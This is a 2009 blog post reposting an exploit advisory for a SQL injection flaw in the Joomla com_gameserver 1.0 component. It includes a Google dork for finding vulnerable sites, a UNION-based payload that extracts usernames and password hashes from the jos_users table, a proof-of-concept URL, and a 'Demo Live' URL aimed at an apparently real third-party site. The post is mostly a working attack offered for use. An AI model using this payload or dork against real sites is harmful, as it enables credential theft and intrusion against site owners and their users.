Friday, October 23, 2009

Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability

[+] Software : Game Server Component
[+] Version : 1.0
[+] Vendor : http://www.indianpulse.in/
[+] License : GPL
[+] Vulnerable : SQL Injection
[+] Google Dork : inurl:"com_gameserver"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] 999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] SQLi p0c:
[+] http://127.0.0.1/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] Demo Live:
[+] http://www.jacker.ro/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
p0st3d by : at
Label:

No comments:

Post a Comment

try to make something then you never be lost

Subscribe to: Post Comments (Atom)

+++

Share |

"make something then You never be lost"

wibiya widget